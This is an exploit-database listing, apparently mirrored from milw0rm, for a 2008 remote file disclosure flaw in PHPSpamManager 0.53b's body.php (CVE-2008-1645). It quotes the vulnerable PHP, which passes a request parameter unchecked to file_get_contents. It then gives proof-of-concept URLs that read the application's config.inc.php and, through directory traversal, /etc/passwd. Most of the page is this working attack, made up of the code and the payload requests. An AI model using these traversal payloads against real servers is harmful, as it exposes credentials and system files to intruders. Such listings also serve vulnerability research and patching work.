[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPSpamManager 0.53b - 'body.php' Remote File Disclosure

Author: GoLd_M
type: webapps
platform: php
port: 
date_added: 2008-03-30 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44209;CVE-2008-1645 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpspammanager.0.53.dev.zip
phpSpamManager 0.53 beta (body.php) Remote File Disclosure Vulnerability
D.Script : http://sourceforge.net/project/showfiles.php?group_id=141000
Vuln Code
Ln 38 -> 47 :
//get filename
     $okprint=false;
     $filename = $_REQUEST['filename']; <--- XxX
     if ($filename!='FILENAME')
     {
      debug_print("analysing " .$filename);
      //replace # by dots if necessary
      $filename = preg_replace("/#/",".",$filename);
$mailtext=file_get_contents($filename); <--- XxX
	 $email=new parseMail($mailtext); <--- XxX
POC :
/phpspammanager.0.53.dev/body.php?filename=include/config.inc.php
/phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd
                     I'm Mahmood_ali --- I'm Tryagi

# milw0rm.com [2008-03-31]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.